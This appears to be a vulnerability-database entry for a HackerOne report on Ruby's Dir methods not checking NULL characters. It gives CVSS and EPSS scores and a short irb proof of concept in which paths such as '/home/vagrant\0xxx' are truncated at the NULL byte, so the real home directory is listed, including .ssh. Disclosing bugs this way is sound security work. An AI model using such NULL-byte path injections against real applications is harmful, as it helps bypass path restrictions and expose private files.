Ruby: The possibility that unintended file operation may be performed because some methods of `Dir` do not check NULL characters.

2018-01-0410:03:14

ooooooo_q

hackerone.com

$500

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.003 Low

EPSS

Percentile

62.2%

JSON

It seems that entries,new, and empty? do not check NULL characters in methods of Dir.

[vagrant@localhost ~]$ ls
test
[vagrant@localhost ~]$ irb
irb(main):001:0&gt; Dir.open("/home/vagrant\0xxx") do |d|
irb(main):002:1* p d.read   # =&gt; "."
irb(main):003:1&gt; p d.read   # =&gt; ".."
irb(main):004:1&gt; p d.read
irb(main):005:1&gt; p d.read
irb(main):006:1&gt; end
"."
".."
".bash_logout"
".bash_profile"
=&gt; ".bash_profile"

irb(main):007:0&gt; d = Dir.new("/home/vagrant\0xxx")
=&gt; #&lt;Dir:/home/vagrantxxx&gt;
irb(main):008:0&gt; p d.read   # =&gt; "."
"."
=&gt; "."
irb(main):009:0&gt; p d.read   # =&gt; ".."
".."
=&gt; ".."
irb(main):010:0&gt; p d.read
".bash_logout"
=&gt; ".bash_logout"
irb(main):011:0&gt; p d.read
".bash_profile"
=&gt; ".bash_profile"

irb(main):012:0&gt; Dir.entries("/home/vagrant\0yyy")
=&gt; [".", "..", ".bash_logout", ".bash_profile", ".bashrc", ".ssh", ".rbenv", ".pki", ".bash_history", "test"]

irb(main):013:0&gt; Dir.empty?("/home/vagrant\0zzz")
=&gt; false